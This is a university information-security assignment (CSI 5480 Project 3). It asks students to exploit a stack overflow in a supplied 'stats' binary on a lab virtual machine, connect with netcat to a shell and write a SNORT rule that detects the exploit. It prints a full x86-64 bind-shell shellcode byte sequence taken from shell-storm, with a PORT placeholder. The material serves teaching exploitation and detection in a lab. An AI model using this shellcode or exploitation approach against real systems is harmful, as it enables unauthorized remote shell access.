IT Security Attacking Virtual Machine Project
CSI 5480 – Information Security Practice
Project 3 (Prj3)
Connects to the following learning outcomes:
Footprinting, scanning, and enumeration; common system vulnerabilities; system remediation and
hardening; intrusion detection; hands-on experiments on information security.
Grade Weight:
6%
Due date:
December 5th, at 23:59:59 PM.
Task Description
The challenge is to analyze, ethically exploit, and mitigate a stack overflow in a target executable.
Please follow the steps below to deploy the required files in your testbed and ethically develop the
exploit:
1) Decompress the archive Project3.zip. The files in that archive are the following:
a) stats, an ELF 64-bit LSB executable
b) stats.txt, a text file that is used to store statistical data
c) stats.c is the source code for the stats executable
2) Place the files stats and stats.txt on the Virtual Machine under the path “/usr/ctf/museum/html/cgi-
bin”. You can use sftp to upload those files onto the Virtual Machine.
3) Run the target executable stats on the Virtual Machine, and ethically exploit it over the virtual
network from the physical machine. Figuring out the port that stats listens on is part of the footprinting
and scanning challenge, so no information is given here at this time.
Students can use the publicly available shellcode from shell storm:
http://shell-storm.org/shellcode/files/shellcode-858.php
The actual shellcode is the following sequence of bytes:
“\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a”
“\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0”
“\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02″
PORT”\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05”
“\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31”
“\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59”
“\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48”
“\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a”
“\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54”
“\x5f\x6a\x3b\x58\x0f\x05”;
Do not forget to replace PORT with the two bytes that represent the port that you chose to connect to
and get a shell on the compromised machine. Once you inject the shellcode and execute it on the virtual
machine, you need to use netcat to connect to it on the port in question, and that is how you get the
shell.
The deliverable will be an exploit that interacts with the target executable stats such as to inject code
into its memory, and thus corrupt addresses such as to have the injected code executed. The injected
code should run a shell on the compromised machine.
As a mitigation, develop a SNORT rule that can detect your exploit without false positives.
Final considerations:
1) There is a mechanism in place to protect the saved instruction pointer, i.e., the return address, from corruption.
2) The stack may not be your only friend!
Good luck to you!
Grading Rubric
The following rubric details how your submission will be graded:
Accomplishment Points
Correct exploit with correct SNORT
signature.
6
Correct exploit but no working SNORT
signature.
4
Partially correct exploit with correct
SNORT signature.
3
Partially correct exploit with partially
correct SNORT signature.
2
Incorrect or no exploit. 0